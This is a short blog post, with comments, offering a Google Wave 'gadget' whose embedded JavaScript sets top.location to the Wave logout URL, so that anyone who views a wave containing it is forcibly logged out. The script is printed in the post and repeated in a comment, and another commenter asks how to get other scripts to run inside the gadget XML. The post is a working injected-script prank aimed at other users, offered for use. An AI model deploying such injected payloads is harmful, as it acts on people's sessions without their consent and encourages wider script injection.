Google Wave – Make your friends logout gadget

Adding this gadget to any wave will make people log out when they see it:

http://beford.org/stuff/waveg.xml

The code:

<script type="text/javascript">
top.location="https://wave.google.com/wave/logout";
</script>

This entry was posted in Uncategorized and tagged , , , , , . Bookmark the permalink.

3 Responses to Google Wave – Make your friends logout gadget

  1. Pingback: Social Media Security » Social Media Security Podcast 5 – Google Reader, Privacy, Wave, ChromeOS and Foursquare

  2. Jaimin says:

    also i am trying to create another script but problem is that….
    tag used as a XML tag…thats why script is not running…!!
    how to run script in XML>…?

  3. Sinfocol says:

    you can see at the example:

    top.location="https://wave.google.com/wave/logout";

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>